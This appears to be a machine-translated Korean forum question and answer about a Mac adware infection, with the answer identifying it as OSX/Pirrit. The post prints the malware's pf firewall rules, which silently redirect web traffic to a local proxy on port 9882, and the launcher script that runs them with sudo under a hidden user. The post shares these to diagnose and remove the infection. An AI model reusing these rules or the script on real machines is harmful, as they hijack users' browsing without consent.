최근에 MBP 10.10.5 Yosemite에서 웹페이지를 탐색할 때 Chrome Canary 버전 53이 새 탭을 열거나 일부 페이지가 열리지 않는 것을 발견하기 시작했습니다. 이 탭이 나를 임의의 페이지로 리디렉션하고 있었습니다.
방화벽을 활성화하고 의사 소수성 프로세스 호출이 들어오는 연결을 열려고 시도하는 것을 발견했습니다.
/etc/pseudohydrophobia.conf
rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0 inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate
/etc/pseudohydrophobia.sh
#!/bin/sh
if [ -a /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia ];
then
sleep 10
sudo pfctl -evf /etc/pseudohydrophobia.conf
sudo -u volutate /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia
fi
exit 0
포트:
netstat -an | grep 9882
tcp4 0 0 *.9882 *.* LISTEN
/etc/pseudohydrophobia.conf
rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0 inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate
이 스크립트와 바이너리를 모두 삭제할 예정이지만 Google 참조 자료를 찾을 수 없어 게시하고 싶습니다.
답변1
보세요https://objective-see.com/blog/blog_0x0E.html
침입적인 크로스 플랫폼 애드웨어 분석 OSX/피리트
Pirrit 악성코드일 수 있습니다.
사용자 이름 volutate과 파일 이름( pseudohydrophobia)은 무작위로 생성된 것이지만 포트 번호 9882는 동일합니다.